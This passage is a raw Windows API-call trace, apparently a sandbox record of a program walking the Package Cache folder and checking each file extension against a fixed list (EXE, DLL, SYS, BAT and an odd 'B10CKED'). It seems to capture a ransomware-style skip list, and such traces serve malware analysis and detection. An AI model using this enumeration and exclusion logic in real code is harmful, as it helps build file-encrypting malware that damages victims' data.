Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\", cchLength=0x53 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\") returned 0x53 [0110.175] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\*.*", lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 0x1c7f68 [0110.420] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.420] FindNextFileW (in: hFindFile=0x1c7f68, lpFindFileData=0x12ee90 | out: lpFindFileData=0x12ee90) returned 1 [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.420] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE 
CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\", cchLength=0x5c | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\") returned 0x5c [0110.421] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\*.*", lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 0x1c7fa8 
[0110.421] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.421] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: lpFindFileData=0x12ebcc) returned 1 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Package 
Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\", cchLength=0x71 | out: lpsz="C:\\USERS\\ALL USERS\\PACKAGE CACHE\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}V12.0.21005\\PACKAGES\\VCRUNTIMEMINIMUM_X86\\") returned 0x71 [0110.421] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Package Cache\\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}v12.0.21005\\packages\\vcRuntimeMinimum_x86\\*.*", lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0x1c7fe8 [0110.435] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.435] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.435] CharUpperBuffW (in: lpsz="cab", cchLength=0x3 | out: lpsz="CAB") returned 0x3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="CAB", cchCount2=3) returned 1 [0110.435] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.435] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, 
lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="CAB", cchCount2=3) returned 1 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW 
(Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.436] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="CAB", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="CAB", cchCount2=3) returned 2 [0110.437] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 1 [0110.437] CharUpperBuffW (in: lpsz="msi", cchLength=0x3 | out: lpsz="MSI") returned 0x3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="MSI", cchCount2=3) returned 1 [0110.437] 
CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, 
lpString2="MSI", cchCount2=3) returned 3 [0110.437] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="MSI", cchCount2=3) returned 1 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="MSI", cchCount2=3) returned 3 [0110.438] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="MSI", cchCount2=3) returned 2 [0110.438] FindNextFileW (in: hFindFile=0x1c7fe8, lpFindFileData=0x12e908 | out: lpFindFileData=0x12e908) returned 0 [0110.438] FindClose (in: hFindFile=0x1c7fe8 | out: hFindFile=0x1c7fe8) returned 1 [0110.438] FindNextFileW (in: hFindFile=0x1c7fa8, lpFindFileData=0x12ebcc | out: 
